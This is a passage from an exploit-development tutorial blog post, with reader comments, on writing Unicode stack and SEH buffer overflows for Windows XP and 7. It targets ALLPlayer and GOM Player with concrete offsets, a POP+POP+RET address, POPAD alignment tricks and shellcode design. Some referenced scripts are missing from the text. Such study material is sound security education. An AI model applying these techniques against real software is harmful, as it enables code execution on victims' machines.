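The same helper works on bytes read from an assembled binary file opened in binary mode.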

Another option is to write your shellcode in a text editor, save it as an .asm file and assemble it using an assembler such as NASM.


If you’re already comfortable enough with Assembly to know most of the opcodes, yet another option would be to write your hex opcodes directly in a Perl script. Sometimes, if I need to encode the shellcode, I’ll use a simple script such as this one:

You can also use a command line tool like metasm to generate your opcode for any Assembly instructions you may not be sure of.


When it comes to choosing a “best” way, it really is a matter of preference. Sometimes, if I’m building in a Windows environment, I’ll go with C. Other times, I find myself generating the bulk of my shellcode in an Assembler, moving it to my exploit script and modifying/adding one-off instructions directly in my script using metasm. For this example, I’ll build the entire shellcode in an .asm file, assemble it, and encode it before incorporating it into our Perl exploit script.

Let’s get to it…

As we’ve already discussed, we will be using two functions from Kernel32.dll to meet objectives 2 and 3 (execute calc.exe and exit cleanly). To do so, we need to obtain the base address of that module. In order to also meet objective 4 (working in Win XP SP 3 and Win 7 SP 1), we need to be able to get this address dynamically at run time. There are several ways to do this, but the method we’re going to use is a more universal one that is described here. We’ll need to access the Process Environment Block (PEB), an opaque (partially documented) Windows structure that we touched on in Part 1 of this exploit series. It contains multiple process-specific data structures, one of which is useful to us for finding our DLL address. Specifically, the PEB_LDR_DATA structure (found at offset 0x0C of the PEB) contains an entry called InMemoryOrderModuleList, which is a doubly-linked list that contains all of the loaded modules for the process. What’s great about Kernel32.dll is that it’s always located at the third entry of this list so we know exactly where to find it. While we’re parsing the PEB, the other thing we’re going to want is the value of OSMajorVersion, which is located at offset 0xA4. We’ll need this value when we need to choose the appropriate offset to our Kernel32 functions depending on our target OS (XP vs 7). Here’s the first portion of our shellcode that gathers these two pieces of information for us.

Once these instructions have executed, ECX will contain OSMajorVersion and EBX will contain the base address of kernel32.dll.
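To make the pointer chasing easier to picture, here is a toy model in Python (not the actual shellcode, which is Assembly). It treats memory as a dictionary of 32-bit values. Every address and value in it is invented, and the 0x14 (list head inside PEB_LDR_DATA) and 0x10 (DllBase relative to the list links) offsets are the commonly documented 32-bit layout rather than something taken from this post, so treat them as assumptions.

```python
# Toy model of 32-bit process memory: address -> 32-bit value.
# Every address and value below is invented for illustration.
PEB = 0x7FFD0000
LDR = 0x00251E90
EXE_LINKS = 0x00251F00
NTDLL_LINKS = 0x00251FA0
K32_LINKS = 0x00252040
K32_BASE = 0x76D40000

memory = {
    PEB + 0x0C: LDR,            # PEB.Ldr points to PEB_LDR_DATA
    PEB + 0xA4: 6,              # PEB.OSMajorVersion (6 on Windows 7, 5 on XP)
    LDR + 0x14: EXE_LINKS,      # InMemoryOrderModuleList.Flink -> first entry
    EXE_LINKS: NTDLL_LINKS,     # first entry (typically the executable) -> second
    NTDLL_LINKS: K32_LINKS,     # second entry (typically ntdll.dll) -> third
    K32_LINKS + 0x10: K32_BASE, # DllBase of the third entry (kernel32.dll)
}


def read_dword(addr: int) -> int:
    """Stand-in for a 32-bit memory read such as mov reg, [addr]."""
    return memory[addr]


def find_kernel32(peb: int) -> int:
    """Follow PEB -> Ldr -> InMemoryOrderModuleList to the third module's base."""
    ldr = read_dword(peb + 0x0C)
    entry = read_dword(ldr + 0x14)  # first entry
    entry = read_dword(entry)       # second entry
    entry = read_dword(entry)       # third entry
    return read_dword(entry + 0x10)


print(hex(find_kernel32(PEB)), read_dword(PEB + 0xA4))
```

Each `read_dword` call corresponds to one memory dereference, which is why this walk fits in so few bytes of shellcode.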

Before we can call WinExec(), we need to push our parameters to the stack. Recall the function prototype:

With a stdcall calling convention we need to push the parameters to the stack in reverse (right-to-left) order. That means we must first push the uCmdShow parameter, which will be 0. Then we’ll push the lpCmdLine parameter, which will be a pointer to the null-terminated string “calc”. Here’s how I accomplish this:

You’ll notice that I use 0 (zero) twice — once as the string terminator and again as the parameter to WinExec(). To do so, I chose to zero out a register (ESI) and push it to the stack twice. I could have just as easily used the push 0 instruction which would have also equated to a total of four bytes. In this case, it’s really just a matter of preference. However, if you needed to use a zero value more than twice, it would be more economical to use the one-byte push esi instruction vs the two-byte push 0 instruction. One more thing to note is that in order to get the pointer to the null-terminated “calc” string, I pushed the string to the stack, then moved the address of the stack pointer to EAX, before pushing that value as the parameter.
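The push sequence described above can be modeled with a small Python sketch (again, not the Assembly itself). The `Stack` class and the starting ESP value are made up for illustration; the point is the order of the pushes and the fact that “calc” goes onto the stack as a single little-endian dword.

```python
import struct


class Stack:
    """Minimal model of a downward-growing 32-bit stack."""

    def __init__(self, top: int = 0x0012F000):  # hypothetical starting ESP
        self.esp = top
        self.mem = {}

    def push(self, value: int) -> None:
        self.esp -= 4
        self.mem[self.esp] = value & 0xFFFFFFFF


# "calc" is exactly four bytes, so it fits in one pushed dword.
calc = struct.unpack("<I", b"calc")[0]

s = Stack()
esi = 0            # xor esi, esi
s.push(esi)        # null terminator for the string
s.push(calc)       # the string bytes "calc"
eax = s.esp        # mov eax, esp -> pointer to "calc\0"
s.push(esi)        # uCmdShow = 0 (rightmost parameter goes first)
s.push(eax)        # lpCmdLine = pointer to the string

print(hex(calc), hex(s.mem[s.esp]), s.mem[s.esp + 4])
```

Reading memory back from `eax` gives the bytes `calc` followed by nulls, which is what WinExec() expects for lpCmdLine.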

Although the parameters for WinExec() are pushed to the stack, we’re not quite ready to call the function…mainly because we don’t have the address to the function yet. While we do have the base address to Kernel32, we don’t yet have the offsets from this address where WinExec() and ExitProcess() are located. We can get these offsets by using the dumpbin.exe utility to list the DLL’s exported functions. Here’s the output from both Windows XP SP3 and Windows 7 SP1:

The third column of the output is the offset we’re looking for. We can use this along with the base address for kernel32.dll to generate the address of each function. Note that if you’re using any other version of Windows, you’ll get different offset values. If you want to test this exploit on that version, replace my offsets with those later on when we write them into our shellcode.

Ok, so we have the addresses to both of our functions for each OS. But how do we know which one to call from our shellcode? The answer lies in checking the OSMajorVersion value we grabbed earlier. Technically, this value alone is not enough to tell you which specific OS version is running. Normally you would also want to grab the OSMinorVersion value, as the two together represent the OS version. However, we’re making some significant assumptions, specifically that we’re either dealing with Windows 7 or Windows XP. Since they each have different OSMajorVersion values (6 vs. 5, respectively), that value alone will be all that we need. Just keep in mind that if this exploit is run on any version in between (Server 2008, Vista, Server 2003, etc), it will probably fail.

As you can see, if OSMajorVersion is 5, we jump to a label “WinXP”, which we’ll get to in a minute. Otherwise, we’re going to proceed to the next section, which is Windows 7-specific.

Remember, EBX contains our base address to Kernel32.dll, so getting the address to each of our functions is simply a matter of adding the corresponding offsets to it.
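As a rough illustration of the version check plus the addition, here is a Python sketch. The offsets in the table are placeholders, not real kernel32.dll values (use the ones from your own dumpbin output), and the two base addresses are invented to show that ASLR moves the base while the offset stays put.

```python
# Placeholder offsets only: these are NOT real kernel32.dll values.
OFFSETS = {
    5: {"WinExec": 0x00011111, "ExitProcess": 0x00022222},  # Windows XP
    6: {"WinExec": 0x00033333, "ExitProcess": 0x00044444},  # Windows 7
}


def resolve(base: int, os_major: int, name: str) -> int:
    """Pick the offset table by OSMajorVersion and add it to the module base."""
    return (base + OFFSETS[os_major][name]) & 0xFFFFFFFF


# Two hypothetical kernel32 base addresses, as ASLR might produce on Windows 7.
base_a = 0x76D40000
base_b = 0x75A10000

addr_a = resolve(base_a, 6, "WinExec")
addr_b = resolve(base_b, 6, "WinExec")

print(hex(addr_a), hex(addr_b))
# The absolute addresses differ, but the distance from each base is identical.
print(hex(addr_a - base_a), hex(addr_b - base_b))
```

This is why hard-coding offsets survives ASLR, and also why it breaks as soon as an update ships a DLL with a different layout.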

We’ll do the exact same thing for Windows XP:

Finally, we need to call the WinExec() and ExitProcess() functions. When testing this exploit, I ran into some stack corruption issues when issuing the CALL instruction which prevented me from calling ExitProcess() afterwards. As an alternative, I chose to push the ExitProcess() address to the stack as the return address immediately before calling WinExec(). What this will do is return to ExitProcess() without the need for a separate call instruction and the program will exit cleanly.
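Here is a small Python model of why that works. It assumes the stack layout built earlier (terminator, “calc”, uCmdShow, lpCmdLine) with the ExitProcess() address pushed last; all addresses are placeholders. In this model the leftover null terminator ends up where ExitProcess() would read its exit code, but whether the original shellcode relies on that is my assumption.

```python
# All addresses are placeholders chosen for illustration.
EXITPROCESS = 0x76D00200
CMD_PTR = 0x0012EFF8
CALC = 0x636C6163  # "calc" as a little-endian dword


def stdcall_ret(stack: list, arg_count: int) -> int:
    """Model a stdcall return: pop the return address, then drop the callee's arguments."""
    ret_addr = stack.pop(0)
    del stack[:arg_count]
    return ret_addr


# Index 0 is the top of the stack, as it looks just before jumping to WinExec().
stack = [EXITPROCESS, CMD_PTR, 0, CALC, 0]

# WinExec() takes two parameters, so it cleans up two dwords when it returns.
next_eip = stdcall_ret(stack, arg_count=2)

print(hex(next_eip))            # where execution continues after WinExec()
print([hex(v) for v in stack])  # what ExitProcess() finds on the stack
```

Because WinExec() is reached with a jump instead of a CALL, no extra return address is pushed, and the function simply returns into ExitProcess().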

That’s it, our shellcode is complete. Here it is all together:

We now need to assemble it and encode it using alpha2.

As a side note, if this were not a Unicode exploit and you needed to incorporate the resulting opcodes directly into your Perl exploit script (or you wanted to incorporate it into a C program), you could use the following bash one-liner (add a concatenation symbol such as . or + as needed) :

By the way, you’ll see that our shellcode is 74 bytes in length, which means we met our first objective with some to spare! Now that we have our alpha2-encoded shellcode, we can complete our Perl exploit script:

Generate the buffer and execute in both Windows XP and 7 and you should get the same results:


Whew, we just covered a lot. Feel free to go back over this example if you’re still unclear on any of the points I covered. Otherwise, continue on to example number 2…an SEH Unicode exploit.

Example 2: SEH Unicode BOF

This next example is a very basic unicode SEH BOF based on a POC by metacom for AllPlayer 5.6.2. You can download the vulnerable app (v5.6.2) from the POC link. The exploit we’ll write in this example is a slight variation of the two I submitted to Exploit-DB (here and here) that should work for both Windows XP SP3 and Windows 7 SP1.

Triggering the Exploit

After you’ve installed the ALLPlayer application on your Windows 7 machine, generate an m3u file containing a 5,000-character buffer as follows:
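A minimal sketch of such a generator in Python (rather than Perl) might look like the following. The file name `crash.m3u` and the helper names are hypothetical, the \xcc filler is inferred from the 00CC00CC overwrite discussed below, and any header or prefix the original PoC places in front of the buffer is not shown here.

```python
def build_payload(size: int = 5000, filler: bytes = b"\xcc") -> bytes:
    """Return a buffer of `size` identical filler bytes."""
    return filler * size


def write_m3u(path: str, payload: bytes) -> None:
    """Write the raw payload to disk in binary mode so no bytes get translated."""
    with open(path, "wb") as fh:
        fh.write(payload)


if __name__ == "__main__":
    # Hypothetical output file name.
    write_m3u("crash.m3u", build_payload())
```

Writing in binary mode matters here: text mode could re-encode bytes above 0x7F and change what the application receives.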

Attach your debugger and open the m3u file in ALLPlayer, which should immediately generate an exception and pause the debugger. Hit Shift+F9 several times to trigger the SEH and you should see the following:


In the stack window (lower right) you can see the SEH record overwrite. Notice however in the disassembly window (top left) that the 00CC00CC overwrite corresponded to a valid address (an issue that I pointed out in the previous example). You’ll have to take this into account when it comes time to calculate the offset to Next SEH/SEH. Although I don’t show it in the above screenshot, if you examine the memory dump window you’ll see that the 5000 character buffer seems to be uninterrupted so we have no issues when it comes to space for our shellcode.

In Immunity, hit Alt+S to view the corrupted SEH chain:


So, we’ve confirmed we definitely have an SEH-based exploit and it’s definitely Unicode. Because this is a Unicode-based SEH-based BOF, our exploit is going to be constructed as follows:


Determining the Offset to Next SEH

The next step is to figure out the offset to Next SEH/SEH. I’ve already illustrated in the previous example how to do so using a Metasploit pattern, so I’ll spare those details here (just remember that you may need to start at an offset into the pattern to avoid overwriting EIP with a valid address).

You’ll find that the offset to Next SEH is 303. We can test that with the following modification to the Perl exploit script:

Using the resulting exploit buffer you should see something similar to the following in your debugger:


For a non-Unicode SEH exploit you would normally overwrite SEH with an address to a POP+POP+RET instruction sequence and overwrite Next SEH with a short jump to hop over SEH and into your shellcode (if you don’t know what I’m talking about, be sure to read this post before moving on). Unfortunately, that won’t work with a Unicode exploit because the two-byte jump instruction in Next SEH would get corrupted by the null byte insertion. Instead, we need to do the following:

  1. Overwrite Next SEH with two single-byte instructions that will execute successfully without interfering with the execution flow to our shellcode.
  2. Overwrite SEH with a Unicode-friendly POP+POP+RET address that will also translate to benign instructions and execute successfully without interfering with the execution flow to our shellcode.
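To see why the usual short jump fails, here is a quick Python sketch that models the simple case where each input byte ends up followed by a null. The `widen` helper is made up for illustration, and \xeb\x06 is just a common choice of short jump, not something taken from this exploit.

```python
def widen(data: bytes) -> bytes:
    """Model the Unicode expansion: every byte is followed by an inserted null."""
    return b"".join(bytes([b, 0]) for b in data)


short_jump = b"\xeb\x06"      # JMP SHORT with a displacement of 6
widened = widen(short_jump)   # what actually lands in memory

opcode = widened[0]
displacement = widened[1]     # the byte the CPU now reads as the jump distance

print(widened.hex(" "), "-> jump displacement is now", displacement)
```

The opcode survives, but the displacement byte is replaced by the inserted null, so the jump no longer lands past SEH.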

Overwriting SEH

Let’s start with the SEH overwrite since that will get triggered first. To find a Unicode-friendly POP+POP+RET address, we can use mona (!mona seh). I ran the mona command on both Windows XP SP3 and Windows 7 so you can see that there is overlap in the addresses that should give us portability across multiple platforms. Once again we have plenty of addresses to choose from.


I’ll use the first one (0x004f002d), placing it in SEH (\x2d\x4f) and leave the \xcc instructions in Next SEH. Re-run the exploit and execute the POP+POP+RET and you should be paused at the first INT instruction located in Next SEH which means our SEH overwrite was successful.


Overwriting Next SEH

The goal with this Unicode exploit is the same as the previous one: redirect execution to our encoded shellcode, which must be pointed to by a pre-defined register (in this case EAX). However, take a look at the previous screenshot and note the current values of the registers. None of them point to our buffer. ESP and EBP are fairly close but would still require some significant adjustment. Now look at the stack. There are several addresses close to the top of the stack that do point to our buffer. Remember that for our Next SEH overwrite we can only use single-byte instructions. These could be completely benign instructions (such as how we used \x42 in the previous example), which would be fine if we had a register that pointed to our shellcode. However, since we don’t, we can use one of the bytes of our Next SEH overwrite to issue a POPAD instruction to load the registers with addresses from the top of the stack. The second byte of Next SEH can simply be a benign instruction (I’ll use \x47 = ADD BYTE PTR DS:[EDI],AL). Here’s the updated exploit script:

Notice in the above script I also adjusted the value $fill to include alternating benign instructions (\x47) and INTs (\xcc) to ensure proper alignment to pause on the first-encountered INT. Here’s the result:


After the POPAD, several registers now point very close to our buffer, with ESI being the closest. Similar to the previous exploit example, we’ll put the address currently in ESI into EAX by issuing PUSH ESI and POP EAX instructions. Then we can modify the value in EAX using some ADD/SUB instructions and add some additional alignment instructions if necessary to ensure it points directly to our shellcode.

I want you to notice one more thing about the above screenshot. Look at the instruction at 0012ED38 (SUB EAX, 47004F00). This is actually our SEH POP+POP+RET address being executed as an instruction. Again, normally in traditional SEH exploits Next SEH is overwritten with a short jump that hops over the SEH address. However, in a Unicode exploit, not only does SEH have to be a valid POP+POP+RET address, but because we can’t issue a JMP, that address must also be able to successfully execute as its own instruction! In our case we got lucky, but it’s possible that the first address you try won’t execute properly and you’ll have to choose a different one.
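You can reproduce that disassembly by hand. The Python sketch below expands the Next SEH and SEH bytes used above (plus the first \x47 of $fill) the way the Unicode conversion does, then reads the same bytes two ways: as the SEH pointer and as the operand of a SUB EAX instruction. The `widen` helper is made up for illustration.

```python
import struct


def widen(data: bytes) -> bytes:
    """Model the Unicode expansion: every byte is followed by an inserted null."""
    return b"".join(bytes([b, 0]) for b in data)


nseh = b"\x61\x47"       # POPAD + padding byte
seh = b"\x2d\x4f"        # becomes the pointer 0x004f002d
fill_start = b"\x47"     # first byte of $fill

in_memory = widen(nseh + seh + fill_start)
# Layout: 61 | 00 47 00 | 2d 00 4f 00 47 | 00 ...
#   61             POPAD
#   00 47 00       ADD BYTE PTR [EDI+0], AL
#   2d 00 4f 00 47 SUB EAX, imm32

seh_pointer = struct.unpack("<I", in_memory[4:8])[0]
sub_operand = struct.unpack("<I", in_memory[5:9])[0]

print(in_memory.hex(" "))
print(hex(seh_pointer), hex(sub_operand))
```

The 0x2d low byte of the SEH address doubles as the SUB EAX opcode, which then swallows the next four bytes as its operand, including the first byte of $fill.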

Adjusting EAX

Once we move the address in ESI into EAX, we need to adjust it to get it to point to our shellcode. But what do we adjust it to? In my case, ESI points to 0x0012EAB0. Take a look below at an expanded view of the Memory Dump window:


That address is about 24 bytes from the start of our buffer. We know we have an additional 316d bytes of $junk + $nseh + $seh before we get to the $fill portion of our buffer. Multiply this by 2 to account for the Unicode nulls and you’ve got 632d. We’ll also take up some additional bytes with the ADD/SUB instructions and the corresponding Venetian padding. Since the inserted nulls mean we can only ADD/SUB in increments of 100h, we’ll need to adjust EAX by at least 300h (768d). We’ll need to fine tune it a bit, but let’s see where that gets us. First, let’s update the Perl script to incorporate the ADD/SUB instructions with the alternating Venetian alignment instructions:

Trigger the exploit with the new buffer and you should see the net of the ADD/SUB instructions adjusts EAX by +300h (0012EDB0) as expected.
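The arithmetic is easy to check with a short Python sketch. The ADD/SUB byte values below are hypothetical, picked only so that they net +300h; the starting ESI value is the one from my debugger session above, and `widen` is a made-up helper that models the null insertion.

```python
import struct


def widen(data: bytes) -> bytes:
    """Model the Unicode expansion: every byte is followed by an inserted null."""
    return b"".join(bytes([b, 0]) for b in data)


def imm32_after_widening(three_bytes: bytes) -> int:
    """Opcode + two operand bytes expand to opcode 00 YY 00 XX, i.e. imm32 0xXX00YY00."""
    return struct.unpack("<I", widen(three_bytes)[1:5])[0]


esi = 0x0012EAB0                 # value observed in ESI after the POPAD

add_bytes = b"\x05\x19\x11"      # hypothetical: ADD EAX, 0x11001900 once expanded
sub_bytes = b"\x2d\x16\x11"      # hypothetical: SUB EAX, 0x11001600 once expanded

add_val = imm32_after_widening(add_bytes)
sub_val = imm32_after_widening(sub_bytes)

eax = (esi + add_val - sub_val) & 0xFFFFFFFF

print(hex(add_val), hex(sub_val), hex(add_val - sub_val), hex(eax))
print(316 * 2, 0x300)            # 632 bytes to cover vs. a 768-byte adjustment
```

Only the second and fourth bytes of each operand are under our control, so the smallest adjustment available is 100h, and any remaining gap has to be closed with padding.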


Take a look at the memory dump window and you should see that the current location of EAX is a total of 82 bytes (including nulls) from the end of our last $venalign instruction (\xc3) as represented by the highlighted section below.


This means we need to put another $junk2 buffer 41 bytes in length (to account for the inserted nulls) in front of our shellcode to ensure that EAX will point to the very first byte.

The Shellcode

Remember, we don’t really have any space constraints with this exploit so we can use a standard, alpha-encoded payload. I’ll use metasploit to generate it as follows:

If you notice, even though the formatting of the resulting shellcode is hex, it is only made up of alphanumeric characters. If you really want to convert this to the ASCII representation you can use the following one-liner:
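An equivalent conversion can be sketched in a few lines of Python. The sample bytes are illustrative only and are not the payload generated above; `to_ascii` is a made-up helper name.

```python
def to_ascii(shellcode: bytes) -> str:
    """Decode alphanumeric shellcode bytes to their ASCII text form."""
    return shellcode.decode("ascii")


# Illustrative bytes only, not the actual generated payload.
sample = b"\x50\x50\x59\x41\x49\x41\x49\x41"

text = to_ascii(sample)
print(text, text.isalnum())
```

If the decode raises an error or `isalnum()` returns False, the payload contains bytes outside the alphanumeric range and was not encoded the way you expected.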

Now that we have generated our shellcode, all we have to do is modify our exploit by adding it along with the additional $junk2 buffer and everything should work as planned. Here’s the final exploit script:

And the results:



Congrats, you’ve just successfully written two Unicode buffer overflow exploits. Read on to see a couple of quick examples of how you may be able to avoid Unicode altogether.

Avoiding Unicode

There are times when writing a working Unicode exploit is too much trouble or just isn’t possible because you can’t find the necessary Unicode-friendly addresses. Although it may not happen often, you may be able to avoid Unicode altogether by changing the format of your input. Take, for example, this alternate BladeAPIMonitor exploit by b33f (Ruben Boonen). He found that if he copy/pasted his buffer into Windows Notepad first, and then copied it into the application input, it would be processed by the application as standard ANSI/multibyte characters. If you followed along with my first Unicode exploit example you’ve already downloaded the application, so feel free to give it a try.

I came across a similar situation when I discovered a vulnerability in GOM Player. The application stores Equalizer presets in the registry as REG_MULTI_SZ values.


The vulnerable version of GOM Player loads these values at run time but does not perform any bounds checking so any of them could be used to trigger a Unicode SEH Buffer Overflow (as shown below).


However, what I found was that if I changed the registry entry type to REG_BINARY, I could avoid the Unicode conversion and my buffer would be processed as ANSI (ASCII).


Here is the resulting stack:

All that I needed to do was have my exploit script create the buffer as a binary string in a reg file. This meant that instead of using the standard \xBB hex format, I simply made every byte of the buffer comma-delimited as follows:
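The formatting step can be sketched in Python as follows. The value name `ExamplePreset` and the helper names are hypothetical, and the registry key path is deliberately left out; only the `hex:` comma-delimited form of a REG_BINARY value is shown.

```python
def to_reg_hex(buf: bytes) -> str:
    """Format bytes as the comma-delimited hex list used for REG_BINARY values."""
    return "hex:" + ",".join(f"{b:02x}" for b in buf)


def reg_value_line(name: str, buf: bytes) -> str:
    """Build one value line for a .reg file; the key header is not included."""
    return f'"{name}"={to_reg_hex(buf)}'


# Hypothetical value name and a tiny stand-in buffer.
print(reg_value_line("ExamplePreset", b"AAAB"))
```

The real buffer would be the full exploit string, passed through the same helper byte for byte.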

I won’t walk through the entire exploit, but feel free to check out the previous link to download the application and try it out for yourself.

While avoiding Unicode may not always be possible, if you find yourself faced with a seemingly impossible Unicode exploit, try experimenting with your string formats to see if you can avoid the Unicode altogether.


In Windows, you are typically dealing with either ANSI (multibyte) or Unicode (wide) strings. Both ANSI and Unicode can represent ASCII characters, though each uses a different encoding approach: ANSI uses multiple single- and double-byte code pages and Unicode uses a consistent 2-byte encoding. The two exploit examples were meant to demonstrate how to construct a standard and an SEH Unicode buffer overflow using encoded shellcode and alternating “Venetian” offset instructions. We even did a crash course on writing some (very rudimentary) shellcode to accommodate strict space constraints. Finally, I provided two examples of situations where Unicode may be avoided depending on how the buffer string is formatted.

I hope you found this post informative and useful. As always, if you have any corrections, comments or questions, please feel free to leave them below — I look forward to hearing from you. I’ll be working on the next installment in this series as well as some other related posts in the coming weeks.

Until next time …  – Mike

11 Comments

  1. metacom says:

    The best tutorials 2013-2014 🙂

    That’s well done!

    keep it up =D>

  2. NO-MERCY says:

    Hi . . Mike
    as Metacom said “The Best Win Exploitation Tutorials 2013\2014”
    Tell Him Let Me Reply First Once 🙂

    I’ll Prepare PDF’s Final Sooon
    & i have Some ???
    I Need Small Example About Brute force Aslr in WINDOWS !!
    What’s The Next Part ?

    Thank You So Much For That Great Job
    Kind Regards
    Greetings ..

    • Mike Czumak says:

      Thanks! As for the next part, I’m not quite sure. I’m currently working on a blind SQLi post. For the Win Exploit series I plan to cover some other basics more in-depth such as DEP, ASLR, ROP, and shellcode before moving into kernel exploits and maybe some other topics such as UAC bypass. I also plan on making a corresponding series about Windows fundamentals (system calls, portions of the Win32 API, etc.) and I’m considering doing a series on reverse engineering on Windows. Of course all of this takes a lot of time and mine is pretty limited!

      Why Brute Force ASLR and for what version of Windows? I take it this would be for a scenario where there are no non-aslr modules loaded? Unless you know otherwise, I feel the chance of success of a brute-force attack against a modern implementation of ASLR in Windows is pretty low (though it is technically possible). You have to consider not only the predictability of the addresses but also the response of the target vulnerable application/service (e.g. will it crash?).

  3. tk says:

    Best exploit dev tutorial out there. Many thanks and looking forward for the next.

  4. vaampz says:

    you the pro man 🙂

  5. NO-MERCY says:

    Hello Mike :

    Part 7 Now Available As PDF
    Sorry 4 This Long Time
    Hope To Find It Useful & Any Suggest

    Link :

    CRC32: 0E78627C
    MD5: 08AD6EB5017A2DE7F32AEB4920D32757

    previous Parts here ( Shared Folder )

    Kind Regards

  6. Iran Eduardo says:

    Oh! Thanks you for these great tuts.

    What windows 7 you use in these tutorials, 32 or 64 bits?